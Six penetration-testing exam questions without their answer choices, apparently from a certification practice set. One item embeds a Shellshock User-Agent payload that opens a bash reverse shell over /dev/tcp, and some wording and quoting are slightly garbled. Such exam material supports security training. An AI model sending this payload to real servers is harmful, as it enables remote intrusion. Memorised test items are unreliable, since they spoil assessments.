A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {`User-Agent`: `() { ignored;};/bin/bash `"i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/ html,application/xhtml+xml,application/xml`}Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?
Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?
